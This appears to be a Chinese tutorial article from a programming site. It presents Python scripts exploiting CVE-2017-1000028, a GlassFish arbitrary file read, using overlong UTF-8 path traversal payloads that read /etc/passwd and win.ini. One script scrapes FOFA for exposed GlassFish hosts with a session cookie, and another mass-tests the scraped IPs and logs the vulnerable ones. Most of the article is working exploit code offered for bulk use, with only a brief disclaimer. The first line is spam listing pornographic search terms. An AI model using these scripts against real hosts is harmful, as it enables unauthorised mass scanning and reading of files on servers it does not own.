亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

Python腳本開發(fā)漏洞的批量搜索與利用(GlassFish?任意文件讀取)

 更新時間:2022年05月19日 14:36:34   作者:半個西瓜.  
這篇文章主要介紹了Python?開發(fā)漏洞的批量搜索與利用(GlassFish?任意文件讀取),主要包括python開發(fā)學習的意義及測試漏洞是否存在的步驟,需要的朋友可以參考下

Python 開發(fā)學習的意義:

(1)學習相關安全工具原理.

(2)掌握自定義工具及拓展開發(fā)解決實戰(zhàn)中無工具或手工麻煩批量化等情況.

(3)在二次開發(fā) Bypass,日常任務,批量測試利用等方面均有幫助.

免責聲明:

嚴禁利用本文章中所提到的工具和技術進行非法攻擊,否則后果自負,上傳者不承擔任何責任。

測試漏洞是否存在的步驟:

(1)應用服務器GlassFish 任意文件讀取 漏洞.

#測試應用服務器glassfish任意文件讀取漏洞.
import requests                                 #調用requests模塊
 
url="輸入IP地址/域名"                            #下面這個二個是漏洞的payload
payload_linux='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'            #檢測linux系統(tǒng)的
payload_windows='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'        #檢測windows系統(tǒng)
data_linux=requests.get(url+payload_linux).status_code  #獲取請求后的返回源代碼,requests.get是網絡爬蟲,status_code是獲取狀態(tài)碼
data_windows=requests.get(url+payload_windows).status_code      #獲取請求后的返回源代碼,requests.get是網絡爬蟲,status_code是獲取狀態(tài)碼
if data_windows==200 or data_linux==200:            #200說明可以請求這個數據.則存在這個漏洞.
    print("漏洞存在")
else:
    print("漏洞不存在")

效果圖:

(2)批量搜索漏洞.(GlassFish 任意文件讀?。–VE-2017-1000028)

import base64
import requests
from lxml import etree
import time
#(1)獲取到可能存在漏洞的地址信息-借助Fofa進行獲取目標.
#(2)批量請求地址信息進行判斷是否存在-單線程和多線程
search_data='"glassfish" && port="4848"'        #這個是搜索的內容.
headers={                                       #要登錄賬號的Cookie.
    'Cookie':'HMACCOUNT=52158546FBA65796;result_per_page=20'        #請求20個.
}
for yeshu in range(1,11):                       #搜索前10頁.
    url='https://fofa.info/result?page='+str(yeshu)+'&qbase64='         #這個是鏈接的前面.
    search_data_bs = str(base64.b64encode(search_data.encode("utf-8")), "utf-8")        #對數據進行加密.
    urls=url+search_data_bs
    print('正在提取第'+str(yeshu)+'頁')                           #打印正在提取第的頁數.
    try:                                    #請求異常也執(zhí)行.
        result=requests.get(urls,headers=headers,timeout=1).content           #requests.get請求url,請求的時候用這個headers=headers頭(就是加入Cookie請求),請求延遲 timeout=1,content將結果打印出來.
        #print(result.decode('utf-8'))               #decode是編碼.
        soup=etree.HTML(result)                     #把結果進行提取.(調用HTML類對HTML文本進行初始化,成功構造XPath解析對象,同時可以自動修正HMTL文本)
        ip_data=soup.xpath('//a[@target="_blank"]/@href')          #也就是爬蟲自己要的數據 ,提取a標簽,后面為@target="_blank"的href值也就是IP地址.
        #print(ip_data)
        ipdata='\n'.join(ip_data)               #.join(): 連接字符串數組。將字符串、元組、列表中的元素以指定的字符(分隔符)連接生成一個新的字符串
        print(ip_data)
        with open(r'ip.txt','a+') as f:         #打開一個文件(ip.txt),f是定義的名.
            f.write(ipdata+'\n')                #將ipdata的數據寫進去,然后換行.
            f.close()                           #關閉.
    except Exception as e:
        pass
        #執(zhí)行后文件下面就會生成一個ip.txt文件.

效果圖:

(3)漏洞的利用.(GlassFish 任意文件讀?。–VE-2017-1000028)

import requests
import time
payload_linux='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
payload_windows='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
 
for ip in open('ip.txt'):       #打開ip.txt文件
    ip=ip.replace('\n','')      #替換換行符 為空.
    windows_url=ip+payload_windows        #請求windows
    linux_url=ip+payload_linux            #請求linux
    #print(windows_url)
    #print(linux_url)
    try:
        print(ip)
        result_code_linux=requests.get(windows_url).status_code                #請求linux
        result_code_windows=requests.get(linux_url).status_code              #請求windows
        print("chrck->" +ip)            #打印在檢測哪一個IP地址.
        if result_code_linux==200 or result_code_windows==200:
            with open(r'result.txt','a+') as f:           #寫入result.txt文件.
                f.write(ip)                 #如果有漏洞就寫入ip.
 
        time.sleep(5)
    except Exception as e:
        pass

效果圖:

(4)漏洞的利用.

到此這篇關于Python 開發(fā)漏洞的批量搜索與利用(GlassFish 任意文件讀取)的文章就介紹到這了,更多相關python開發(fā) 漏洞內容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關文章希望大家以后多多支持腳本之家!

相關文章

  • 基于Python實現模擬三體運動的示例代碼

    基于Python實現模擬三體運動的示例代碼

    此前所做的一切三體和太陽系的動畫,都是基于牛頓力學的,而且直接對微分進行差分化,從而精度非常感人,用不了幾年就得撞一起去。所以本文來用Python重新模擬一下三體運動,感興趣的可以了解一下
    2023-03-03
  • PyCharm無法登陸Codeium的解決方法

    PyCharm無法登陸Codeium的解決方法

    Codeium插件可以自動建議、解釋代碼、生成注釋和根據注釋生成代碼等,本文主要介紹了PyCharm無法登陸Codeium的解決方法,感興趣的可以了解一下
    2023-11-11
  • 簡單文件操作python 修改文件指定行的方法

    簡單文件操作python 修改文件指定行的方法

    使用python進行簡略的文件讀寫
    2013-05-05
  • python如何獲取當前文件夾下所有文件名詳解

    python如何獲取當前文件夾下所有文件名詳解

    這篇文章主要給大家介紹了關于python如何獲取當前文件夾下所有文件名的相關資料,文中給出了詳細的示例代碼,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面來一起看看吧
    2019-01-01
  • Python?NLP開發(fā)之實現聊天機器人

    Python?NLP開發(fā)之實現聊天機器人

    這篇文章主要為大家介紹了Python如何實現聊天機器人,即使用自然語言處理?(NLP)?來幫助用戶通過文本、圖形或語音與?Web?服務或應用進行交互,感興趣的可以了解一下
    2023-05-05
  • Matplotlib繪圖基礎之幾何圖形的繪制詳解

    Matplotlib繪圖基礎之幾何圖形的繪制詳解

    除了繪制各類分析圖形(比如柱狀圖,折線圖,餅圖等等)以外,matplotlib?也可以在畫布上任意繪制各類幾何圖形,下面小編就來和大家講講如何繪制常見的幾種幾何圖形吧
    2023-08-08
  • python中的iterator和"lazy?iterator"區(qū)別介紹

    python中的iterator和"lazy?iterator"區(qū)別介紹

    這篇文章主要介紹了python中的iterator和?“l(fā)azy?iterator“之間有什么區(qū)別,本文通過實例代碼給大家介紹的非常詳細,對大家的學習或工作具有一定的參考借鑒價值,需要的朋友可以參考下
    2023-04-04
  • 全網最細 Python 格式化輸出用法講解(推薦)

    全網最細 Python 格式化輸出用法講解(推薦)

    這篇文章主要介紹了全網最細 Python 格式化輸出用法講解,本文給大家介紹的非常詳細,對大家的學習或工作具有一定的參考借鑒價值,需要的朋友可以參考下
    2021-01-01
  • 200行python代碼實現2048游戲

    200行python代碼實現2048游戲

    這篇文章主要為大家詳細介紹了200行Python代碼實現2048游戲,具有一定的參考價值,感興趣的小伙伴們可以參考一下
    2019-07-07
  • Python時間管理黑科技之datetime函數詳解

    Python時間管理黑科技之datetime函數詳解

    在Python中,datetime模塊是處理日期和時間的標準庫,它提供了一系列功能強大的函數和類,用于處理日期、時間、時間間隔等,本文將深入探討datetime模塊的使用方法,感興趣的可以了解下
    2023-08-08

最新評論